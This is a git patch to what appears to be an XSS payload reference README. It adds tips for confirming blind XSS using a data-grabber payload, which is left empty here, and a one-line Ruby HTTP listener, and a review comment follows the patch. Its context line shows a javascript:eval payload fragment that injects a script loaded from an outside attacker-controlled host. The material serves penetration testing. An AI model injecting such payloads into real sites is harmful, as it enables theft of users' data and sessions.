From c469236204861ee8cadc2e546897fef496dff95d Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Wed, 16 Jun 2021 13:25:46 +0200 Subject: [PATCH] XSS: add quick tips for bXSS --- XSS Injection/README.md | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 45a49a1..b5fed57 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -453,6 +453,22 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu - Comment Box - Administrative Panel +### Tips + +You can use [Data grabber for XSS](#data-grabber-for-xss) and a one-line HTTP server to confirm the existence of a blind XSS before deploying an heavy blind XSS platform. + +Eg. payload + +```html + +``` + +Eg. one-line HTTP server: + +``` +$ ruby -run -ehttpd . -p8080 +``` + ## Mutated XSS Use browsers quirks to recreate some HTML tags when it is inside an `element.innerHTML`.
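Review bot: The `html` fence under "Eg. payload" in the new Tips section is empty as it appears here, so the tip shows the listener but not the request it is supposed to receive; either fill in the payload or replace the block with a pointer to a specific entry in the Data grabber for XSS section that is already linked. In the same hunk, the server example `ruby -run -ehttpd . -p8080` serves the current working directory, so it is worth a sentence telling readers to start it from an empty directory so that nothing else in that directory is exposed while they wait for the callback. Smaller points: "an heavy" should be "a heavy", "Eg. payload" is missing the colon that "Eg. one-line HTTP server:" has, and the second fence has no language tag while the first is tagged `html`.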